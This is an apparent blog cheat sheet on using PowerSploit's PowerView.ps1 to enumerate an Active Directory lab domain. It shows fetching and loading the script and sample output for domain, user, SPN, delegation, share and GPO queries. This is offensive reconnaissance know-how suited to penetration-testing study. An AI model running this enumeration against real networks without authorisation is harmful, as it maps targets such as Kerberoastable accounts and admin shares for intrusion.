PowerView AD Enumeration

4 minute read

Intro

Hello all, today I will give a quick overview of PowerView.ps1 and its usefull AD enumeration commands. Firstly, I’ll go over loading the PowerView Module into PowerShell and then I will show you some of the commands with a sample output, think of this like a cheat sheet for PowerView.

Download Link: PowerSploit Repo

Loading PowerView.ps1

Firstly, make sure you are in the same directory as the PowerView.ps1 file. We also need to unblock the file with the Unblock-File cmdlet.

Downloading:

1
curl https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -O PowerView.ps1

Unblocking:

1
2
PS C:\Users\Administrator> Unblock-File .\PowerView.ps1
PS C:\Users\Administrator>

Loading:

1
PS C:\Users\Administrator> . .\PowerView.ps1

Enumeration Commands

Domain Information

1
Get-NetDomain

Shows information about the current domain, includign all domain controllers

PS C:\Users\Administrator> Get-NetDomain

Forest                  : lab.local
DomainControllers       : {LAB-DC-1.lab.local}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            : LAB-DC-1.lab.local
RidRoleOwner            : LAB-DC-1.lab.local
InfrastructureRoleOwner : LAB-DC-1.lab.local
Name                    : lab.local

PS C:\Users\Administrator>
1
Get-NetDomainController

Shows us the ip and location of the DC

PS C:\Users\Administrator> Get-NetDomainController

Forest                     : lab.local
CurrentTime                : 28/06/2020 17:29:18
HighestCommittedUsn        : 16443
OSVersion                  : Windows Server 2019 Standard
Roles                      : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain                     : lab.local
IPAddress                  : fe80::10cd:dd9b:b02:d70%6
SiteName                   : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections         : {}
OutboundConnections        : {}
Name                       : LAB-DC-1.lab.local
Partitions                 : {DC=lab,DC=local, CN=Configuration,DC=lab,DC=local, CN=Schema,CN=Configuration,DC=lab,DC=local,
                             DC=DomainDnsZones,DC=lab,DC=local...}

PS C:\Users\Administrator>
1
Get-DomainPolicy

Shows us the Domain Policy Info

PS C:\Users\Administrator> Get-DomainPolicy
Name                           Value
----                           -----
Kerberos Policy                {MaxTicketAge, MaxServiceAge, MaxClockSkew, MaxRenewAge...}
System Access                  {MinimumPasswordAge, MaximumPasswordAge, LockoutBadCount, PasswordComplexity...}
Version                        {Revision, signature}
Registry Values                {MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash}
Unicode                        {Unicode}

PS C:\Users\Administrator> (Get-DomainPolicy)."system access"
Name                           Value
----                           -----
MinimumPasswordAge             {1}
MaximumPasswordAge             {42}
LockoutBadCount                {0}
PasswordComplexity             {1}
RequireLogonToChangePassword   {0}
LSAAnonymousNameLookup         {0}
ForceLogoffWhenHourExpire      {0}
PasswordHistorySize            {24}
ClearTextPassword              {0}
MinimumPasswordLength          {7}

PS C:\Users\Administrator>

Users, Groups and Computers

1
Get-NetUser

Gives us information on all the users in the domain, this can be made more concise with the select command

PS C:\Users\Administrator> Get-NetUser | select samaccountname

samaccountname
--------------
Administrator
Guest
krbtgt
svc-backup
svc-tgt


PS C:\Users\Administrator>
1
Get-NetComputer

Lists all computers joined to the domain, you can get more info with -FullData flag

PS C:\Users\Administrator> Get-NetComputer -FullData

pwdlastset                    : 27/06/2020 19:27:27
logoncount                    : 9
msds-generationid             : {138, 162, 14, 106...}
serverreferencebl             : CN=LAB-DC-1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=lab,DC=local
badpasswordtime               : 01/01/1601 00:00:00
distinguishedname             : CN=LAB-DC-1,OU=Domain Controllers,DC=lab,DC=local
objectclass                   : {top, person, organizationalPerson, user...}
lastlogontimestamp            : 27/06/2020 20:26:58
name                          : LAB-DC-1
objectsid                     : S-1-5-21-1086465519-1901182224-3361014284-1000
samaccountname                : LAB-DC-1$
localpolicyflags              : 0
codepage                      : 0
samaccounttype                : 805306369
whenchanged                   : 27/06/2020 19:36:56
accountexpires                : 9223372036854775807
countrycode                   : 0
adspath                       : LDAP://CN=LAB-DC-1,OU=Domain Controllers,DC=lab,DC=local
instancetype                  : 4
msdfsr-computerreferencebl    : CN=LAB-DC-1,CN=Topology,CN=Domain System
                                Volume,CN=DFSR-GlobalSettings,CN=System,DC=lab,DC=local
objectguid                    : 69302386-0a0e-4824-8f29-6517ba022186
operatingsystem               : Windows Server 2019 Standard
operatingsystemversion        : 10.0 (17763)
lastlogoff                    : 01/01/1601 00:00:00
objectcategory                : CN=Computer,CN=Schema,CN=Configuration,DC=lab,DC=local
dscorepropagationdata         : {27/06/2020 18:27:12, 01/01/1601 00:00:01}
serviceprincipalname          : {Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/LAB-DC-1.lab.local,
                                ldap/LAB-DC-1.lab.local/ForestDnsZones.lab.local,
                                ldap/LAB-DC-1.lab.local/DomainDnsZones.lab.local, TERMSRV/LAB-DC-1...}
usncreated                    : 12293
lastlogon                     : 28/06/2020 12:05:21
badpwdcount                   : 0
cn                            : LAB-DC-1
useraccountcontrol            : 532480
whencreated                   : 27/06/2020 18:27:08
primarygroupid                : 516
iscriticalsystemobject        : True
msds-supportedencryptiontypes : 28
usnchanged                    : 12775
ridsetreferences              : CN=RID Set,CN=LAB-DC-1,OU=Domain Controllers,DC=lab,DC=local
dnshostname                   : LAB-DC-1.lab.local

PS C:\Users\Administrator>
1
Get-NetGroup

Lists the groups in the domain and can be more specific with: Get-NetGroup -GroupName “Domain Admins”

PS C:\Users\Administrator> Get-NetGroup
Administrators
Users
Print Operators
Remote Desktop Users
Network Configuration Operators
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
Storage Replica Administrators
Domain Computers
Domain Controllers
Schema Admins
Enterprise Admins
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy
PS C:\Users\Administrator>
1
Get-NetUser -SPN

Lists all users in the domain with a Service Principal Name set.

PS C:\Users\Administrator> Get-NetUser -SPN

logoncount            : 0
badpasswordtime       : 01/01/1601 00:00:00
distinguishedname     : CN=svc-backup,CN=Users,DC=lab,DC=local
objectclass           : {top, person, organizationalPerson, user}
displayname           : svc-backup
userprincipalname     : svc-backup@lab.local
name                  : svc-backup
objectsid             : S-1-5-21-1086465519-1901182224-3361014284-1103
samaccountname        : svc-backup
admincount            : 1
codepage              : 0
samaccounttype        : 805306368
whenchanged           : 28/06/2020 17:17:26
accountexpires        : 9223372036854775807
countrycode           : 0
adspath               : LDAP://CN=svc-backup,CN=Users,DC=lab,DC=local
instancetype          : 4
usncreated            : 12780
objectguid            : ad3fcb7a-397d-48be-9c9c-3c85c1a0f056
lastlogoff            : 01/01/1601 00:00:00
objectcategory        : CN=Person,CN=Schema,CN=Configuration,DC=lab,DC=local
dscorepropagationdata : {27/06/2020 19:41:28, 27/06/2020 19:39:59, 01/01/1601 00:00:00}
serviceprincipalname  : LAB/Backup
givenname             : svc-backup
memberof              : CN=Backup Operators,CN=Builtin,DC=lab,DC=local
lastlogon             : 01/01/1601 00:00:00
badpwdcount           : 0
cn                    : svc-backup
useraccountcontrol    : 66048
whencreated           : 27/06/2020 19:39:59
primarygroupid        : 513
pwdlastset            : 27/06/2020 20:39:59
usnchanged            : 16431

PS C:\Users\Administrator>
1
Invoke-UserHunter -Unconstrained -ShowAll

Enumerates servers that allow unconstrained kerberos delegation and show all users logged in

PS C:\Users\Administrator> Invoke-UserHunter -Unconstrained -ShowAll


UserDomain      : LAB
UserName        : Administrator
ComputerName    : LAB-DC-1.lab.local
IPAddress       : 192.168.0.49
SessionFrom     :
SessionFromName :
LocalAdmin      :

UserDomain      : LAB
UserName        : LAB-DC-1$
ComputerName    : LAB-DC-1.lab.local
IPAddress       : 192.168.0.49
SessionFrom     :
SessionFromName :
LocalAdmin      :

PS C:\Users\Administrator>

Group Policy and Shares

1
Invoke-ShareFinder

Will list all of the shares on all computers in the domain

PS C:\Users\Administrator> Invoke-ShareFinder
\\LAB-DC-1.lab.local\ADMIN$     - Remote Admin
\\LAB-DC-1.lab.local\C$         - Default share
\\LAB-DC-1.lab.local\IPC$       - Remote IPC
\\LAB-DC-1.lab.local\NETLOGON   - Logon server share
\\LAB-DC-1.lab.local\SYSVOL     - Logon server share
PS C:\Users\Administrator>
1
Get-NetGPO

Shows us all of the GPO for the domain, can reveal interesting information such as a disabled antivirus

PS C:\Users\Administrator> Get-NetGPO

usncreated              : 16448
displayname             : Disable Windows Defender
whenchanged             : 28/06/2020 18:34:44
objectclass             : {top, container, groupPolicyContainer}
gpcfunctionalityversion : 2
showinadvancedviewonly  : True
usnchanged              : 16453
dscorepropagationdata   : 01/01/1601 00:00:00
name                    : {5DDDD650-72B3-4F8A-94F6-74D5BDCBDE8D}
adspath                 : LDAP://CN={5DDDD650-72B3-4F8A-94F6-74D5BDCBDE8D},CN=Policies,CN=System,DC=lab,DC=local
flags                   : 0
cn                      : {5DDDD650-72B3-4F8A-94F6-74D5BDCBDE8D}
gpcfilesyspath          : \\lab.local\SysVol\lab.local\Policies\{5DDDD650-72B3-4F8A-94F6-74D5BDCBDE8D}
distinguishedname       : CN={5DDDD650-72B3-4F8A-94F6-74D5BDCBDE8D},CN=Policies,CN=System,DC=lab,DC=local
whencreated             : 28/06/2020 18:34:44
versionnumber           : 0
instancetype            : 4
objectguid              : cb0c35eb-c890-471c-98b1-1b99e64b67cc
objectcategory          : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=lab,DC=local

PS C:\Users\Administrator>

Conclusions

Well, I hope you found this article somewhat interesting or at the very least, informative and if you did consider dropping me a +rep on HTB or a follow on twitter, if you want to read up more about these commands then take a look here, GitHub Gist.

Categories:

Updated: